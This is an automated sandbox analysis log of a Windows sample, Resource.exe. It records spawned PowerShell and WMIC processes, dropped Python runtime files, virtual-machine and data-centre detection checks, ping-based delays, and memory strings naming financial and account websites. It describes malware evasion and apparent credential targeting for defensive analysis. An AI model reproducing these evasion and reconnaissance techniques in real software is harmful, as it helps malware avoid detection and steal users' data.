Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8444	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 980	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8314	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1116	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4562
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2653
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3366
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1163
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3722
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3586
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2195
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1796

Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\Resource.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17110

Source: C:\Users\user\Desktop\Resource.exe

API coverage: 9.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep count: 8444 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep count: 980 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep count: 8314 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep count: 1116 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep count: 4562 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep count: 321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep count: 2653 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep count: 57 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep count: 3366 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep count: 745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep count: 3754 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep count: 1163 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428	Thread sleep count: 3722 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep count: 732 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep count: 3586 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep count: 697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep count: 2195 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep count: 1796 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6E60B7E4C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6E60B7E4C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60A88D0 FindFirstFileExW,FindClose,	0_2_00007FF6E60A88D0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6E60C1EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	103_2_00007FF6185E46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	103_2_00007FF6185DE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186288E0 FindFirstFileExA,	103_2_00007FF6186288E0

Source: C:\Users\user\Desktop\Resource.exe

Code function: 1_2_00007FF8A87E0180 GetSystemInfo,

1_2_00007FF8A87E0180

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000002.2205667566.0000018CAA3C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000002.2205667566.0000018CAA3C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
